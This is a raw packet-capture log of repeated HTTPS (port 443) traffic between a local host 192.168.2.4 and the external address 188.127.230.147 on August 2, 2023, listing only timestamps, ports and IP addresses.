Aug 2, 2023 10:35:13.010420084 CEST	443	49693	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:13.010451078 CEST	49693	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:13.011074066 CEST	49693	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:13.013636112 CEST	49693	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:13.013674021 CEST	443	49693	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.396862984 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.396912098 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.398176908 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.414083004 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.414115906 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.545061111 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.545237064 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.547940969 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.547966957 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.548357010 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.556622028 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.602819920 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.720503092 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.720545053 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.720571995 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.720630884 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.720662117 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.720679045 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.720684052 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.720714092 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.720729113 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.720742941 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.720745087 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.720786095 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.764086008 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.779134989 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.779181004 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.779262066 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.779339075 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.779356003 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.779385090 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.779402971 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.779427052 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.821398020 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.821449041 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.821599960 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.821636915 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.821662903 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.837655067 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.837711096 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.837809086 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.837852955 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.837872982 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.837878942 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.837914944 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.837969065 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.837985992 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.838013887 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.838040113 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.838074923 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.838386059 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.838537931 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.838665009 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.838696957 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.838713884 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.879785061 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.879836082 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.879925966 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.879964113 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.879993916 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.880048037 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.880076885 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.880105019 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.898281097 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.898328066 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.898428917 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.898433924 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.898457050 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.898473024 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.898497105 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.898505926 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.898520947 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.898544073 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.898567915 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.898689985 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.898724079 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.898755074 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.898765087 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.898808002 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.898993969 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.899029970 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.899079084 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.899096012 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.899113894 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.899132967 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.900152922 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.900188923 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.900294065 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.900310993 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.900346041 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.900362015 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.900368929 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.900397062 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.900422096 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.900429964 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.900459051 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.900481939 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.900546074 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.900567055 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.900604963 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.900614023 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.900652885 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.900676012 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.900696039 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.900732040 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.900738955 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.900758028 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.900783062 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.900814056 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.900836945 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.900871038 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.900880098 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.900909901 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.900933981 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.900943041 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.900954962 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.900983095 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.900995016 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.901005030 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.901043892 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.901060104 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.938555956 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.938601017 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.938776970 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.938812017 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.938878059 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.939060926 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.939090014 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.939136982 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.939147949 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.939191103 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.958770037 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.958839893 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.959006071 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.959032059 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.959089041 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.963275909 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.963308096 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.963402987 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.963424921 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.963469028 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.963505030 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.963529110 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.963570118 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.963578939 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.963610888 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.963635921 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.963702917 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.963733912 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.963774920 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.963785887 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.963821888 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.963849068 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.963910103 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.963936090 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.963977098 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.963985920 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.964016914 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.964046001 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.964103937 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.964145899 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.964174032 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.964181900 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.964214087 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.964240074 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.964282036 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.964303970 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.964386940 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.964402914 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.964416027 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.964445114 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.964484930 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.964512110 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.964524984 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.964534998 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.964555979 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.964580059 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.964636087 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:14.964646101 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:14.964694977 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.056737900 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.056772947 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.056879997 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.056900024 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.056948900 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.057063103 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.057085991 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.057146072 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.057159901 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.057173967 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.057195902 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.057593107 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.057612896 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.057679892 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.057688951 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.057725906 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.075488091 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.075525045 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.075575113 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.075594902 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.075606108 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.075628996 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.081470013 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.081506014 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.081568003 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.081587076 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.081600904 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.081621885 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.082489014 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.082520962 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.082556963 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.082568884 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.082590103 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.082607031 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.082942963 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.082971096 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.082999945 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.083008051 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.083034039 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.083050013 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.083153009 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.083178043 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.083205938 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.083213091 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.083236933 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.083256006 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.083350897 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.083375931 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.083408117 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.083417892 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.083439112 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.083455086 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.083548069 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.083580971 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.083612919 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.083621979 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.083641052 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.083657026 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.084080935 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.084109068 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.084146023 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.084153891 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.084173918 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.084188938 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.084286928 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.084311962 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.084338903 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.084346056 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.084369898 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.084386110 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.084564924 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.084592104 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.084631920 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.084640980 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.084669113 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.084685087 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.084727049 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.084750891 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.084779978 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.084785938 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.084810972 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.084830999 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.084870100 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.084896088 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.084924936 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.084933043 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.084956884 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.084973097 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085011959 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085035086 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085062981 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085071087 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085098028 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085113049 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085161924 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085185051 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085212946 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085218906 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085244894 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085263014 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085313082 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085335970 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085365057 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085371971 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085397005 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085412025 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085458994 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085480928 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085510015 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085517883 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085542917 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085558891 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085602999 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085627079 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085661888 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085670948 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085695028 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085712910 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085757017 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085778952 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085808992 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085815907 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085844994 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085861921 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085908890 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085932016 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085962057 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.085969925 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.085993052 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.086009979 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.086051941 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.086074114 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.086105108 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.086112022 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.086134911 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.086155891 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.086191893 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.086216927 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.086247921 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.086256027 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.086280107 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.086297989 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.086342096 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.086476088 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.127139091 CEST	49694	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:15.127180099 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.127227068 CEST	443	49694	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:15.127382994 CEST	443	49694	188.127.230.147	192.168.2.4
